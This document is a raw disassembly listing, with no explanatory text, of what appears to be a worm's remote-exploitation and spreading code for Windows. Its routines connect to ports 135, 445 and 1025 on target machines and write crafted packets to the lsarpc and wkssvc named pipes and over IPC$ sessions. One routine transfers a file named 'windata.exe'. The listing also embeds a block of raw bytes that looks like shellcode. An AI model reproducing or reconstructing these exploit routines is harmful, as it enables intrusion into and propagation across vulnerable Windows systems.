cmp [ebp-4], ebx
jz short loc_41020F
push dword ptr [ebp-4]
call ds:dword_444140
mov [ebp-4], ebx
loc_41020F: ; CODE XREF: seg000:00410199�j
; seg000:00410201�j
cmp dword ptr [ebp-0Ch], 0EAh
jz loc_41014E
cmp [ebp-4], ebx
jz short loc_41022A
push dword ptr [ebp-4]
call ds:dword_444140
loc_41022A: ; CODE XREF: seg000:0041021F�j
cmp dword ptr [ebp-0Ch], 5
jnz short loc_410273
cmp ds:off_43C220, ebx
jz short loc_410273
mov eax, offset off_43C220
mov [ebp-8], eax
loc_410240: ; CODE XREF: seg000:00410271�j
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
lea esi, [ebp+8]
rep movsd
lea ecx, [ebp-30h]
push ecx
push dword ptr [eax]
call sub_410047
add esp, 0C4h
cmp eax, 1
jz short loc_410273
mov eax, [ebp-8]
add eax, 4
cmp [eax], ebx
mov [ebp-8], eax
jnz short loc_410240
loc_410273: ; CODE XREF: seg000:0041022E�j
; seg000:00410236�j ...
xor eax, eax
inc eax
loc_410276: ; CODE XREF: seg000:00410149�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41027B proc near ; CODE XREF: seg000:004104B4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_4]
lea eax, [esi+esi]
cmp [ebp+arg_C], eax
jnb short loc_41028F
or eax, 0FFFFFFFFh
jmp short loc_4102AE
; ---------------------------------------------------------------------------
loc_41028F: ; CODE XREF: sub_41027B+D�j
xor eax, eax
test esi, esi
jbe short loc_4102AB
mov ecx, [ebp+arg_8]
loc_410298: ; CODE XREF: sub_41027B+2E�j
mov edx, [ebp+arg_0]
mov dl, [eax+edx]
mov [ecx+eax*2], dl
mov byte ptr [ecx+eax*2+1], 0
inc eax
cmp eax, esi
jb short loc_410298
loc_4102AB: ; CODE XREF: sub_41027B+18�j
mov eax, [ebp+arg_C]
loc_4102AE: ; CODE XREF: sub_41027B+12�j
pop esi
pop ebp
retn
sub_41027B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 10A8h
call sub_41EA20
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push 1
push eax
call sub_41AA0A
mov esi, eax
cmp esi, 1
pop ecx
pop ecx
jz loc_4105A2
push 0FDE8h
push 539h
call sub_41B325
pop ecx
pop ecx
push eax
mov [ebp-8], eax
call ds:dword_444260 ; htons
movzx eax, ax
xor eax, 9999h
mov [ebp-10h], eax
push 2
lea eax, [ebp-10h]
push eax
push offset dword_43FD90
call sub_41F400
add esp, 0Ch
mov eax, esi
dec eax
dec eax
jz loc_4103E9
push 8522h
mov dword ptr [ebp-4], 8520h
call sub_41FEB2
mov dword ptr [esp], 8521h
xor ebx, ebx
mov esi, eax
push ebx
push esi
call sub_41E5F0
push 24h
push offset dword_43FEFC
push esi
call sub_41F400
mov eax, 1004600h
lea edi, [esi+24h]
mov ecx, 1FFAh
push 2
rep stosd
lea eax, [esi+7FF4h]
push ebx
push eax
call sub_41E5F0
push 4FAh
lea eax, [esi+7FF6h]
push offset dword_4403F0
push eax
call sub_41F400
mov eax, 4001h
push 5
mov [esi+18h], eax
mov [esi+20h], eax
lea eax, [esi+7E0h]
push offset dword_43FE7C
push eax
mov dword ptr [esi+8], 8520h
mov dword ptr [esi+10h], 84F0h
call sub_41F400
add esp, 3Ch
xor edi, edi
loc_4103B1: ; CODE XREF: seg000:004103CC�j
push 1
lea eax, [esi+edi+24h]
push 90h
push eax
call sub_41E5F0
add esp, 0Ch
inc edi
cmp edi, 1A9h
jle short loc_4103B1
push 195h
lea eax, [esi+3Ch]
push offset dword_43FCE0
push eax
call sub_41F400
add esp, 0Ch
jmp loc_4104EB
; ---------------------------------------------------------------------------
loc_4103E9: ; CODE XREF: seg000:00410316�j
push 24F2h
mov dword ptr [ebp-4], 24F0h
call sub_41FEB2
mov dword ptr [esp], 24F1h
xor ebx, ebx
mov esi, eax
push ebx
push esi
call sub_41E5F0
push 24h
push offset dword_43FED8
push esi
call sub_41F400
mov eax, offset loc_410041
lea edi, [esi+24h]
mov ecx, 800h
push 2
rep stosd
lea eax, [esi+2024h]
push ebx
push eax
call sub_41E5F0
push 4CAh
lea eax, [esi+2026h]
push offset dword_43FF20
push eax
call sub_41F400
mov eax, 1001h
push 4
mov [esi+18h], eax
mov [esi+20h], eax
lea eax, [esi+1654h]
push offset dword_43FE78
push eax
mov dword ptr [esi+8], 24F0h
mov dword ptr [esi+10h], 24C0h
call sub_41F400
push 8
lea eax, [esi+165Ch]
push offset off_43FE84
push eax
call sub_41F400
add esp, 48h
mov edi, 32Ah
push edi
call sub_41FEB2
push edi
push ebx
push eax
mov [ebp-0Ch], eax
call sub_41E5F0
push edi
mov edi, [ebp-0Ch]
push edi
push 195h
push offset dword_43FCE0
call sub_41027B
add esp, 20h
cmp eax, 0FFFFFFFFh
jnz short loc_4104D0
push edi
call sub_41FEAD
pop ecx
loc_4104C8: ; CODE XREF: seg000:004106C1�j
xor eax, eax
inc eax
jmp loc_4105A4
; ---------------------------------------------------------------------------
loc_4104D0: ; CODE XREF: seg000:004104BF�j
push 328h
lea eax, [esi+1664h]
push edi
push eax
call sub_41F400
push edi
call sub_41FEAD
add esp, 10h
loc_4104EB: ; CODE XREF: seg000:004103E4�j
cmp dword ptr [ebp+0A8h], 87h
jz short loc_410517
cmp dword ptr [ebp+0A8h], 1BDh
jz loc_4105A9
cmp dword ptr [ebp+0A8h], 401h
jnz loc_41059B
loc_410517: ; CODE XREF: seg000:004104F5�j
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call ds:dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-20h], eax
call ds:dword_444260 ; htons
push ebx
push 1
push 2
mov [ebp-22h], ax
call ds:dword_444100 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41059B
push 10h
lea eax, [ebp-24h]
push eax
push edi
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_41059B
push ebx
push 48h
push offset dword_43FE90
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41059B
push ebx
push 2710h
lea eax, [ebp-10A8h]
push eax
push edi
call ds:dword_444064 ; recv
push ebx
push dword ptr [ebp-4]
push esi
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz loc_410670
loc_41059B: ; CODE XREF: seg000:00410511�j
; seg000:0041054A�j ...
push esi
call sub_41FEAD
loc_4105A1: ; CODE XREF: seg000:00410608�j
pop ecx
loc_4105A2: ; CODE XREF: seg000:004102D3�j
; seg000:004106AA�j
xor eax, eax
loc_4105A4: ; CODE XREF: seg000:004104CB�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4105A9: ; CODE XREF: seg000:00410501�j
lea eax, [ebp-44h]
push eax
lea eax, [ebp+0Ch]
push eax
call sub_40C89B
test eax, eax
pop ecx
pop ecx
jz short loc_41059B
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-0A8h]
push offset aSPipeLsarpc ; "\\\\%s\\pipe\\lsarpc"
push eax
call sub_41E6A6
add esp, 0Ch
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
lea eax, [ebp-0A8h]
push eax
call ds:dword_42B08C ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41060A
loc_4105F8: ; CODE XREF: seg000:00410650�j
lea eax, [ebp+0Ch]
push eax
call sub_40C979
push esi
call sub_41FEAD
pop ecx
jmp short loc_4105A1
; ---------------------------------------------------------------------------
loc_41060A: ; CODE XREF: seg000:004105F6�j
push ebx
lea eax, [ebp-0Ch]
push eax
push 1000h
lea eax, [ebp-10A8h]
push eax
push 48h
push offset dword_43FE90
push edi
call ds:dword_42B088 ; TransactNamedPipe
cmp byte ptr [ebp-10A6h], 0Ch
jz short loc_410635
push edi
jmp short loc_41064A
; ---------------------------------------------------------------------------
loc_410635: ; CODE XREF: seg000:00410630�j
push ebx
lea eax, [ebp-14h]
push eax
push dword ptr [ebp-4]
push esi
push edi
call ds:dword_42B084 ; WriteFile
test eax, eax
push edi
jnz short loc_410652
loc_41064A: ; CODE XREF: seg000:00410633�j
call ds:dword_42B004 ; CloseHandle
jmp short loc_4105F8
; ---------------------------------------------------------------------------
loc_410652: ; CODE XREF: seg000:00410648�j
call ds:dword_42B004 ; CloseHandle
lea eax, [ebp+0Ch]
push eax
call sub_40C979
push esi
call sub_41FEAD
pop ecx
pop ecx
push 1F4h
jmp short loc_410684
; ---------------------------------------------------------------------------
loc_410670: ; CODE XREF: seg000:00410595�j
push edi
call ds:dword_444218 ; closesocket
push esi
call sub_41FEAD
mov dword ptr [esp], 1F4h
loc_410684: ; CODE XREF: seg000:0041066E�j
call ds:dword_42B014 ; Sleep
push dword ptr [ebp-8]
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
cmp al, 1
jnz loc_4105A2
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
inc dword ptr [eax]
jmp loc_4104C8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 25A8h
call sub_41EA20
push ebx
push esi
push edi
lea eax, [ebp-11A8h]
push eax
push 2
call ds:dword_42B204 ; WSAStartup
xor ebx, ebx
push ebx
push 1
push 2
call ds:dword_444100 ; socket
mov edi, eax
cmp edi, ebx
mov [ebp-8], edi
jl loc_410A2E
push 1BDh
mov word ptr [ebp-18h], 2
call ds:dword_444260 ; htons
mov [ebp-16h], ax
lea eax, [ebp+0Ch]
push eax
call ds:dword_44417C ; inet_addr
push 8
mov [ebp-14h], eax
lea eax, [ebp-10h]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
push 10h
lea eax, [ebp-18h]
push eax
push edi
call ds:dword_4440AC ; connect
test eax, eax
jl loc_410A2E
push ebx
push 89h
push offset dword_4408F0
push edi
call ds:dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
mov esi, 1000h
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call ds:dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
cmp [ebp-259Fh], bl
jnz loc_410A2E
push ebx
push 0A8h
push offset dword_440980
push edi
call ds:dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call ds:dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
push ebx
push 0DEh
push offset dword_440A30
push edi
call ds:dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call ds:dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
cmp [ebp-259Fh], bl
jnz loc_410A2E
push 30h
lea eax, [ebp-1018h]
push offset dword_440B10
push eax
call sub_41F400
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-15A8h]
push offset aSIpc_1 ; "\\\\%s\\IPC$"
push eax
call sub_41E6A6
lea eax, [ebp-15A8h]
push eax
lea eax, [ebp-0FE8h]
push eax
call sub_40FB31
lea eax, [ebp-15A8h]
push eax
call sub_41E1C0
shl eax, 1
movzx edi, ax
add eax, 9
mov [ebp-4], eax
push 1
lea eax, [ebp-4]
push eax
lea eax, [ebp-0FEBh]
push eax
lea edi, [ebp+edi-0FE8h]
call sub_41F400
push 8
push offset dword_440B44
push edi
call sub_41F400
xor eax, eax
add edi, 8
mov ax, di
lea ecx, [ebp-1018h]
sub ax, cx
push 1
sub eax, 4
mov [ebp-4], eax
lea eax, [ebp-4]
push eax
lea eax, [ebp-1015h]
push eax
call sub_41F400
add esp, 48h
lea eax, [ebp-1018h]
push ebx
sub edi, eax
push edi
mov edi, [ebp-8]
push eax
push edi
call ds:dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call ds:dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
cmp [ebp-259Fh], bl
jnz loc_410A2E
push ebx
push 6Ah
push offset dword_440B50
push edi
call ds:dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call ds:dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
cmp [ebp-259Fh], bl
jnz loc_410A2E
push ebx
push 0A0h
push offset dword_440BC0
push edi
call ds:dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call ds:dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
cmp [ebp-259Fh], bl
jnz loc_410A2E
push esi
lea eax, [ebp-1018h]
push 0FFFFFF90h
push eax
call sub_41E5F0
push 130h
lea eax, [ebp-1018h]
push offset dword_440C68
push eax
call sub_41F400
add esp, 18h
push 4E1Ah
call ds:dword_444260 ; htons
push 158h
mov ds:word_440E6A, ax
lea eax, [ebp-0EE8h]
push offset dword_440DB0
push eax
call sub_41F400
push 0Ch
lea eax, [ebp-790h]
push offset dword_440D9C
push eax
call sub_41F400
add esp, 18h
push ebx
push 894h
lea eax, [ebp-1018h]
push eax
push edi
call ds:dword_4441A0 ; send
test eax, eax
jl short loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call ds:dword_444064 ; recv
push 12Ch
call ds:dword_42B014 ; Sleep
push 4A2Dh
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
test al, al
jz short loc_410A2E
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_410A30
; ---------------------------------------------------------------------------
loc_410A2E: ; CODE XREF: seg000:004106F9�j
; seg000:0041073F�j ...
xor eax, eax
loc_410A30: ; CODE XREF: seg000:00410A2C�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 210h
push esi
xor esi, esi
cmp [ebp+0C4h], esi
push edi
jnz short loc_410A64
push 4
push offset dword_440F10
push offset byte_440F55
call sub_41F400
push 4
push offset dword_440F18
jmp short loc_410A89
; ---------------------------------------------------------------------------
loc_410A64: ; CODE XREF: seg000:00410A48�j
cmp dword ptr [ebp+0C4h], 1
jnz loc_410BA8
push 4
push offset dword_440F20
push offset byte_440F55
call sub_41F400
push 4
push offset dword_440F28
loc_410A89: ; CODE XREF: seg000:00410A62�j
push offset aRrrrrrrrrrrrrr ; ""...
call sub_41F400
add esp, 18h
push offset aWindata_exe ; "windata.exe"
push dword ptr [ebp+8]
call sub_4023C9
pop ecx
push eax
lea eax, [ebp-210h]
push 200h
push eax
call sub_40AE18
add esp, 10h
test eax, eax
jz loc_410BA8
push esi
push 1
push 2
call ds:dword_444100 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_410BA8
push 10h
lea eax, [ebp-10h]
push esi
push eax
call sub_41E5F0
add esp, 0Ch
push dword ptr [ebp+0A8h]
mov word ptr [ebp-10h], 2
call ds:dword_444260 ; htons
mov [ebp-0Eh], ax
lea eax, [ebp+0Ch]
push eax
call ds:dword_44417C ; inet_addr
mov [ebp-0Ch], eax
push 10h
lea eax, [ebp-10h]
push eax
push edi
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_410BA1
push esi
push 85h
push offset dword_440F30
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_410BA1
mov esi, ds:dword_42B014
push 0Ah
call esi ; Sleep
and dword ptr [ebp+0C4h], 0
loc_410B47: ; CODE XREF: seg000:00410B7B�j
lea eax, [ebp-210h]
push 0
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp-210h]
push eax
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_410BA1
push 0Ah
call esi ; Sleep
inc dword ptr [ebp+0C4h]
cmp dword ptr [ebp+0C4h], 7
jl short loc_410B47
push 3E8h
call esi ; Sleep
push edi
call ds:dword_444218 ; closesocket
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_410BAA
; ---------------------------------------------------------------------------
loc_410BA1: ; CODE XREF: seg000:00410B19�j
; seg000:00410B34�j ...
push edi
call ds:dword_444218 ; closesocket
loc_410BA8: ; CODE XREF: seg000:00410A6B�j
; seg000:00410ABB�j ...
xor eax, eax
loc_410BAA: ; CODE XREF: seg000:00410B9F�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
dw 5756h
dd 0EC81006Ah, 0BCh, 8D592F6Ah, 0CC24B4h, 0FC8B0000h, 6AE8A5F3h
dd 81FFFFFEh, 0C0C4h, 81016A00h, 0BCECh, 592F6A00h, 0CC24B48Dh
dd 8B000000h, 0E8A5F3FCh, 0FFFFFE49h, 0C0C481h, 0C0330000h
dd 0C35E405Fh, 3950B855h, 6C8D0002h, 19E89C24h, 530000DEh
dd 0C6A5756h, 33C03359h, 205D88DBh, 0F3217D8Dh, 9D88AAABh
dd 0FFFEFF94h, 0FFB9C033h, 8D00003Fh, 0FEFF95BDh, 66ABF3FFh
dd 59226AABh, 0AA7475FFh, 4332B0BEh, 987D8D00h, 15FFA5F3h
dd 42B200h, 357075FFh, 8080h, 1087A366h, 15FF0044h, 444260h
dd 666C75FFh, 66564589h, 25445C7h, 7C15FF00h, 53004441h
dd 26A016Ah, 0FF584589h, 44410015h, 83F08B00h, 875FFFEh
dd 0E940C033h, 113h, 458D106Ah, 0FF565054h, 4440AC15h
dd 0FFF88300h, 0C00B0775h, 0FAE9h, 4343B800h, 0B94343h
dd 8D000040h, 0FEFF94BDh, 33ABF3FFh, 22D3DC0h, 1C730000h
dd 0FB8888Ah, 8C880044h, 0FFF99405h, 888D40FFh, 0FA00h
dd 0F981h, 0DD720001h, 8878458Ah, 0FF00AF85h, 7C458AFFh
dd 1388068h, 0B0858800h, 8DFFFF00h, 0FDC71485h, 885053FFh
dd 0EDE8945Dh, 6A0000D8h, 20458D32h, 0E1E85053h, 0FF0000D8h
dd 858D6C75h, 0FFFEFF94h, 14858D50h, 68FFFDC7h, 433268h
dd 0D97CE850h, 458D0000h, 8DE85098h, 500000D4h, 0C714858Dh
dd 6850FFFDh, 43325Ch, 0D960E850h, 0C4830000h, 14858D3Ch
dd 53FFFDC7h, 0D46AE850h, 3D8B0000h, 42B210h, 858D5059h
dd 0FFFDC714h, 0D7FF5650h, 5398458Dh, 0D44EE850h, 50590000h
dd 5098458Dh, 53D7FF56h, 458D326Ah, 0FF565020h, 44406415h
dd 205D3800h, 0CF830574h, 3303EBFFh, 0FF5647FFh, 44421815h
dd 5FC78B00h, 0C5835B5Eh, 56C3C964h, 11E8BF57h, 83BE0044h
dd 0FF000000h, 448D0477h, 37FF1424h, 24B4FF56h, 0B8h, 0FE2EE850h
dd 0C483FFFFh, 0FFF88314h, 0C7835174h, 48FF8108h, 7E004412h
dd 1F468D6h, 15FF0000h, 42B014h, 0BCEC8156h, 6A000000h
dd 0B48D592Fh, 0CC24h, 0F3FC8B00h, 0A326E8A5h, 0C4810000h
dd 0C0h, 1775013Ch, 0B424848Bh, 0C1000000h, 808D06E0h
dd 43D888h, 0C03300FFh, 3302EB40h, 0C35E5FC0h
; =============== S U B R O U T I N E =======================================
sub_410E28 proc near ; CODE XREF: seg000:00411000�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
xor edx, edx
cmp [esp+arg_4], edx
jbe short locret_410E58
push esi
mov esi, [esp+4+arg_8]
loc_410E35: ; CODE XREF: sub_410E28+2D�j
mov eax, [esp+4+arg_0]
mov cl, [edx+eax]
mov al, cl
shr al, 4
and cl, 0Fh
add cl, 41h
add al, 41h
mov [esi+edx*2], cl
mov [esi+edx*2+1], al
inc edx
cmp edx, [esp+4+arg_4]
jb short loc_410E35
pop esi
locret_410E58: ; CODE XREF: sub_410E28+6�j
retn
sub_410E28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410E59 proc near ; CODE XREF: sub_410E59+CD�p
; seg000:00411384�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_410E6D
or [ebp+arg_7], 1
jmp short loc_410E71
; ---------------------------------------------------------------------------
loc_410E6D: ; CODE XREF: sub_410E59+C�j
and [ebp+arg_7], 0FEh
loc_410E71: ; CODE XREF: sub_410E59+12�j
mov ebx, [ebp+arg_20]
mov eax, [ebp+arg_24]
lea ecx, [ebx+18h]
cmp ecx, eax
ja short loc_410E92
or [ebp+arg_7], 2
lea eax, [ebx+18h]
mov [ebp+arg_C], ax
mov [ebp+arg_14], ebx
mov [ebp+arg_2B], 0
jmp short loc_410EA4
; ---------------------------------------------------------------------------
loc_410E92: ; CODE XREF: sub_410E59+23�j
mov [ebp+arg_C], ax
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_14], eax
mov [ebp+arg_2B], 1
loc_410EA4: ; CODE XREF: sub_410E59+37�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_41E5D3
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jnz short loc_410EBD
loc_410EB9: ; CODE XREF: sub_410E59+A4�j
xor al, al
jmp short loc_410F32
; ---------------------------------------------------------------------------
loc_410EBD: ; CODE XREF: sub_410E59+5E�j
push 6
pop ecx
mov edi, eax
lea esi, [ebp+arg_4]
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_41F400
add esp, 0Ch
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call ds:dword_42B084 ; WriteFile
test eax, eax
push [ebp+arg_20]
jnz short loc_410EFF
call sub_41E2A1
pop ecx
jmp short loc_410EB9
; ---------------------------------------------------------------------------
loc_410EFF: ; CODE XREF: sub_410E59+9C�j
call sub_41E2A1
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_410F30
push 0
push [ebp+arg_24]
sub ebx, edi
push ebx
add edi, esi
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
lea esi, [ebp+arg_4]
rep movsd
call sub_410E59
add esp, 2Ch
jmp short loc_410F32
; ---------------------------------------------------------------------------
loc_410F30: ; CODE XREF: sub_410E59+B0�j
mov al, 1
loc_410F32: ; CODE XREF: sub_410E59+62�j
; sub_410E59+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_410E59 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 0CC48h
call sub_41EA20
push ebx
push esi
xor ebx, ebx
push edi
inc ebx
lea eax, [ebp+10h]
push ebx
push eax
call sub_41AA0A
cmp eax, 3
pop ecx
pop ecx
jz short loc_410F62
xor eax, eax
jmp loc_4113B2
; ---------------------------------------------------------------------------
loc_410F62: ; CODE XREF: seg000:00410F59�j
push 2B3h
xor esi, esi
lea eax, [ebp-344h]
push esi
push eax
call sub_41E5F0
push 0DACh
lea eax, [ebp-10F0h]
push esi
push eax
call sub_41E5F0
push 1B58h
lea eax, [ebp-2C48h]
push esi
push eax
call sub_41E5F0
push 0DABh
lea eax, [ebp-10F0h]
push 41h
push eax
call sub_41E5F0
mov edi, [ebp+8]
shl edi, 4
mov eax, ds:dword_441410[edi]
mov ecx, ds:dword_44140C[edi]
push 5
mov [ebp+eax-10F0h], ecx
lea eax, [ebp-7F4h]
push offset aFb ; "fìÐ\a"
push eax
call sub_41F400
push 3Fh
lea eax, [ebp-7EFh]
push offset dword_4413C8
push eax
call sub_41F400
add esp, 48h
lea eax, [ebp-344h]
push eax
push 159h
push offset dword_441268
call sub_410E28
lea eax, [ebp-344h]
push eax
call sub_41E1C0
push eax
lea eax, [ebp-344h]
push eax
lea eax, [ebp-7B0h]
push eax
call sub_41F400
lea eax, [ebp-344h]
push eax
call sub_41E1C0
add esp, 20h
mov byte ptr [ebp+eax-7B0h], 0
xor eax, eax
loc_41103E: ; CODE XREF: seg000:00411055�j
movzx cx, byte ptr [ebp+eax-10F0h]
mov [ebp+eax*2-2C48h], cx
inc eax
cmp eax, 0DACh
jb short loc_41103E
lea eax, [ebp+10h]
push eax
push offset aS_1 ; "\\\\%s"
lea eax, [ebp-8C48h]
push 2000h
push eax
call sub_41E6FE
push 2000h
lea eax, [ebp-8C48h]
push eax
lea eax, [ebp-0CC48h]
push eax
call sub_4204DD
lea eax, [ebp+10h]
push offset a__0 ; "."
push eax
call sub_429A60
add esp, 24h
test eax, eax
jz short loc_4110E8
lea eax, [ebp+10h]
push eax
push offset aSIpc ; "\\\\%s\\ipc$"
lea eax, [ebp-4C48h]
push 2000h
push eax
call sub_41E6FE
push 20h
lea eax, [ebp-90h]
push esi
push eax
call sub_41E5F0
add esp, 1Ch
lea eax, [ebp-4C48h]
mov [ebp-7Ch], eax
push esi
mov eax, offset byte_42B633
push eax
push eax
lea eax, [ebp-90h]
push eax
call ds:dword_4441AC
loc_4110E8: ; CODE XREF: seg000:0041109C�j
lea eax, [ebp+10h]
push eax
push offset aSPipeWkssvc ; "\\\\%s\\pipe\\wkssvc"
lea eax, [ebp-6C48h]
push 2000h
push eax
call sub_41E6FE
add esp, 10h
push esi
push esi
push 3
push esi
push 3
push 40000000h
lea eax, [ebp-6C48h]
push eax
call ds:dword_42B08C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp-8], eax
jnz short loc_41112D
loc_411126: ; CODE XREF: seg000:00411223�j
xor edi, edi
jmp loc_4113A5
; ---------------------------------------------------------------------------
loc_41112D: ; CODE XREF: seg000:00411124�j
push 48h
lea eax, [ebp-6Ch]
push esi
push eax
call sub_41E5F0
push 10h
pop eax
push eax
mov [ebp-68h], eax
lea eax, [ebp-4Ch]
push offset dword_433DC8
push eax
mov byte ptr [ebp-6Ch], 5
mov byte ptr [ebp-6Bh], 0
mov byte ptr [ebp-6Ah], 0Bh
mov byte ptr [ebp-69h], 3
mov word ptr [ebp-64h], 48h
mov [ebp-62h], si
mov [ebp-60h], ebx
mov word ptr [ebp-5Ch], 10B8h
mov word ptr [ebp-5Ah], 10B8h
mov [ebp-58h], esi
mov [ebp-54h], ebx
mov [ebp-50h], si
mov byte ptr [ebp-4Eh], 1
mov [ebp-3Ch], ebx
call sub_41F400
push 10h
lea eax, [ebp-38h]
push offset dword_433DB4
push eax
mov dword ptr [ebp-28h], 2
call sub_41F400
add esp, 24h
push esi
lea eax, [ebp-70h]
push eax
push 48h
lea eax, [ebp-6Ch]
push eax
push dword ptr [ebp-8]
call ds:dword_42B084 ; WriteFile
test eax, eax
jz short loc_41121A
lea eax, [ebp-0CC48h]
push eax
call sub_4206A3
pop ecx
lea ebx, [eax+eax+12h]
jmp short loc_4111CE
; ---------------------------------------------------------------------------
loc_4111CD: ; CODE XREF: seg000:004111D1�j
inc ebx
loc_4111CE: ; CODE XREF: seg000:004111CB�j
test bl, 3
jnz short loc_4111CD
cmp ds:byte_441414[edi], 0
jz short loc_4111DF
add ebx, 4
loc_4111DF: ; CODE XREF: seg000:004111DA�j
lea eax, [ebp-2C48h]
push eax
call sub_4206A3
pop ecx
lea eax, [ebx+eax*2+0Eh]
jmp short loc_4111F3
; ---------------------------------------------------------------------------
loc_4111F2: ; CODE XREF: seg000:004111F5�j
inc eax
loc_4111F3: ; CODE XREF: seg000:004111F0�j
test al, 3
jnz short loc_4111F2
add eax, 8
cmp ds:byte_441414[edi], 0
jz short loc_411208
add eax, 4
jmp short loc_41120A
; ---------------------------------------------------------------------------
loc_411208: ; CODE XREF: seg000:00411201�j
inc eax
inc eax
loc_41120A: ; CODE XREF: seg000:00411206�j
push eax
mov [ebp-0Ch], eax
call sub_41E5D3
mov ebx, eax
cmp ebx, esi
pop ecx
jnz short loc_411228
loc_41121A: ; CODE XREF: seg000:004111B8�j
push dword ptr [ebp-8]
call ds:dword_42B004 ; CloseHandle
jmp loc_411126
; ---------------------------------------------------------------------------
loc_411228: ; CODE XREF: seg000:00411218�j
push dword ptr [ebp-0Ch]
push esi
push ebx
call sub_41E5F0
push 4
push offset dword_441258
push ebx
call sub_41F400
lea eax, [ebp-0CC48h]
push eax
call sub_4206A3
inc eax
mov [ebx+0Ch], eax
mov [ebx+4], eax
lea eax, [ebp-0CC48h]
push eax
lea eax, [ebx+10h]
push eax
mov [ebx+8], esi
call sub_41F862
lea eax, [ebp-0CC48h]
push eax
call sub_4206A3
lea eax, [eax+eax+12h]
add esp, 28h
test al, 3
mov [ebp-4], eax
jz short loc_411287
loc_41127F: ; CODE XREF: seg000:00411282�j
inc eax
test al, 3
jnz short loc_41127F
mov [ebp-4], eax
loc_411287: ; CODE XREF: seg000:0041127D�j
cmp ds:byte_441414[edi], 0
jz short loc_4112A6
push 4
add eax, ebx
push offset dword_441260
push eax
call sub_41F400
add esp, 0Ch
add dword ptr [ebp-4], 4
